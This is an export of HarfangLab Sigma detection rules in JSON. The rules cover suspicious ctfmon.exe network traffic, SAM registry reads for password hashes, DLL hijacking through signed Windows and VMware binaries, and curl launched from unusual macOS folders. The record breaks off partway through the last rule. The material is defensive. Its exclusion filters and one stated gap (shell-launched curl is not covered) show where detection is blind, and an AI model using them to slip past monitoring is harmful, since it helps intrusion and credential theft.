"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c",
"rule_name": "Suspicious ctfmon.exe Network Communication",
"rule_description": "Detects network connections from the legitimate ctfmon.exe Windows binary to a public (non-private, non-reserved) IP address when the process was not started by its expected svchost.exe service host (TabletInputService or TextInputManagementService); the destination port itself is not evaluated.\nThis can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed ctfmon.exe process to evade process-based defenses.\nThis technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\nIt has been observed in attacks such as those involving the Pikabot malware, which used this method to deploy the Medusa Stealer.\nIt is recommended to investigate the parent process responsible for starting ctfmon.exe, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\nAdditionally, capturing a memory dump of the ctfmon.exe process for analysis can help confirm whether its code has been replaced.\n",
"rule_creation_date": "2024-02-23",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1071.001",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095725Z",
"creation_date": "2026-03-23T11:45:34.095728Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095732Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md",
"https://attack.mitre.org/techniques/T1003/002/"
],
"name": "t1003_002_susp_sam_database_accessed.yml",
"content": "title: SAM Database Read from Registry via Samdump\nid: 2d774838-fe3c-4704-a1c2-8e1287b6b0ee\ndescription: |\n Detects a suspicious read operation on the F and V registry values under the SAM user account keys, which store local Windows account parameters.\n Adversaries may read these values to extract user information and retrieve the local users' password hashes stored in the SAM database.\n Reads by lsass.exe, by signed processes located in Program Files (regardless of signer), and by Microsoft-signed svchost.exe hosts of the Remote Registry and related services are excluded; it is recommended to check whether any other process accessing these keys has a legitimate reason to do so.\nreferences:\n - https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject:\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\F'\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\V'\n Image|contains: '?'\n\n filter_lsass:\n - Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n - ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_remote_registry:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft 
Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee",
"rule_name": "SAM Database Read from Registry via Samdump",
"rule_description": "Detects a suspicious read operation on the F and V registry values under the SAM user account keys, which store local Windows account parameters.\nAdversaries may read these values to extract user information and retrieve the local users' password hashes stored in the SAM database.\nReads by lsass.exe, by signed processes located in Program Files (regardless of signer), and by Microsoft-signed svchost.exe hosts of the Remote Registry and related services are excluded; it is recommended to check whether any other process accessing these keys has a legitimate reason to do so.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d93119f-c45c-4f21-b353-cd28185a6bcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093883Z",
"creation_date": "2026-03-23T11:45:34.093885Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093889Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_quser.yml",
"content": "title: DLL Hijacking via quser.exe\nid: 2d93119f-c45c-4f21-b353-cd28185a6bcb\ndescription: |\n Detects potential Windows DLL Hijacking via quser.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Loads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'quser.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\UTILDLL.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d93119f-c45c-4f21-b353-cd28185a6bcb",
"rule_name": "DLL Hijacking via quser.exe",
"rule_description": "Detects potential Windows DLL Hijacking via quser.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nLoads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2da166af-7d44-4ca3-a8d3-3210b643d807",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618655Z",
"creation_date": "2026-03-23T11:45:34.618657Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618662Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vmwarexferlogs.yml",
"content": "title: DLL Hijacking via VMwareXferlogs.exe\nid: 2da166af-7d44-4ca3-a8d3-3210b643d807\ndescription: |\n Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/02\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'xferlogs.exe'\n ProcessSignature: 'VMWare, Inc.'\n ImageLoaded|endswith: '\\glib-2.0.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'VMware, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2da166af-7d44-4ca3-a8d3-3210b643d807",
"rule_name": "DLL Hijacking via VMwareXferlogs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-02",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2da5035b-dc02-4700-8b81-859d0243e461",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594519Z",
"creation_date": "2026-03-23T11:45:34.594522Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594529Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmcfghost.yml",
"content": "title: DLL Hijacking via dmcfghost.exe\nid: 2da5035b-dc02-4700-8b81-859d0243e461\ndescription: |\n Detects potential Windows DLL Hijacking via dmcfghost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Loads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmcfghost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\DMPushProxy.dll'\n - '\\dmxmlhelputils.dll'\n - '\\dsclient.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2da5035b-dc02-4700-8b81-859d0243e461",
"rule_name": "DLL Hijacking via dmcfghost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmcfghost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nLoads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617713Z",
"creation_date": "2026-03-23T11:45:34.617715Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_curl_susp_parent.yml",
"content": "title: Curl Executed in a Suspicious Execution Context\nid: 2dd18b86-68a7-4c00-9cd0-36f3ad10d60e\ndescription: |\n Detects the curl command being executed when one of its ancestor processes is located in an uncommon folder (/users/shared/, /private/tmp/, /private/var/tmp/, /private/etc/, /private/var/root/ or a mounted volume under /Volumes/).\n Attackers may execute curl to download additional payloads.\n Note that a curl launched directly by a shell (zsh, sh or bash) is filtered out regardless of where that shell's own ancestors run from, so shell-driven downloads from these folders are not covered by this rule.\n It is recommended to investigate the files that were downloaded and to analyze the process chain that led to the curl command to determine whether this action was legitimate.\nreferences:\n - https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/07/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CommandAndControl\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/curl'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n filter_shell:\n ParentImage|endswith:\n - '/zsh'\n - '/sh'\n - '/bash'\n\n exclusion_adode:\n ProcessParentImage|endswith: '/AcroInstallAlert.app/Contents/MacOS/AcroInstallAlert'\n ProcessCommandLine|startswith: '/usr/bin/curl -H Cache-Control: no-cache https://acroipm2.adobe.com/'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e",
"rule_name": "Curl Executed in a Suspicious Execution Context",
"rule_description": "Detects the curl command being executed when one of its ancestor processes is located in an uncommon folder (/users/shared/, /private/tmp/, /private/var/tmp/, /private/etc/, /private/var/root/ or a mounted volume under /Volumes/).\nAttackers may execute curl to download additional payloads.\nNote that a curl launched directly by a shell (zsh, sh or bash) is filtered out regardless of where that shell's own ancestors run from, so shell-driven downloads from these folders are not covered by this rule.\nIt is recommended to investigate the files that were downloaded and to analyze the process chain that led to the curl command to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2de657e9-b90e-455c-921d-6dc97f347601",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618947Z",
"creation_date": "2026-03-23T11:45:34.618949Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618953Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_slui.yml",
"content": "title: DLL Hijacking via slui.exe\nid: 2de657e9-b90e-455c-921d-6dc97f347601\ndescription: |\n Detects potential Windows DLL Hijacking via slui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Loads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded, as are system DLLs loaded from a container image layer by an slui.exe running from a VHD-backed volume.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'slui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\sppc.dll'\n - '\\wdi.dll'\n - '\\WINBRAND.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_docker:\n Image: 
'\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\slui.exe'\n ImageLoaded: '*\\windowsfilter\\\\*\\Files\\Windows\\System32\\\\*.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2de657e9-b90e-455c-921d-6dc97f347601",
"rule_name": "DLL Hijacking via slui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via slui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nLoads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded, as are system DLLs loaded from a container image layer by an slui.exe running from a VHD-backed volume.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080686Z",
"creation_date": "2026-03-23T11:45:34.080688Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080692Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mshta.yml",
"content": "title: DLL Hijacking via mshta.exe\nid: 2e0c666b-c55c-45ac-b889-dd35b1dd206c\ndescription: |\n Detects potential Windows DLL Hijacking via mshta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Loads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mshta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\netutils.dll'\n - '\\srpapi.dll'\n - 